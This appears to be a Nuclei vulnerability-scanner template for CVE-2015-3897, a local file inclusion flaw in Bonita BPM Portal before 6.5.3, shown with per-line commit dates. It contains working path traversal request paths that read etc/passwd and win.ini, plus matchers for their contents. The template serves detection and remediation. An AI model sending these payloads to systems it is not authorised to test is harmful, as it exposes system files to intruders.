nuclei-templates/http/cves/2015/CVE-2015-3897.yaml

50 lines
1.6 KiB
YAML
Raw Normal View History

2022-04-08 08:41:27 +00:00
id: CVE-2015-3897
2022-04-08 08:41:27 +00:00
info:
name: Bonita BPM Portal <6.5.3 - Local File Inclusion
2022-04-08 08:41:27 +00:00
author: 0x_Akoko
2023-07-11 19:49:27 +00:00
severity: medium
description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability.
2022-04-08 08:41:27 +00:00
reference:
- https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html
- https://www.bonitasoft.com/
2022-04-08 08:41:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-3897
- https://www.htbridge.com/advisory/HTB23259
2022-04-08 08:41:27 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
2022-04-08 08:41:27 +00:00
cve-id: CVE-2015-3897
cwe-id: CWE-22
2023-08-31 11:46:18 +00:00
epss-score: 0.83225
epss-percentile: 0.97993
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: bonitasoft
product: bonita_bpm_portal
tags: unauth,packetstorm,cve,cve2015,bonita,lfi
2022-04-08 08:41:27 +00:00
http:
2022-04-08 08:41:27 +00:00
- method: GET
path:
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd"
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"
2022-04-08 08:41:27 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
matchers-condition: or
2022-04-08 08:41:27 +00:00
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2022-04-08 08:41:27 +00:00
- type: regex
regex:
- "root:[x*]:0:0:"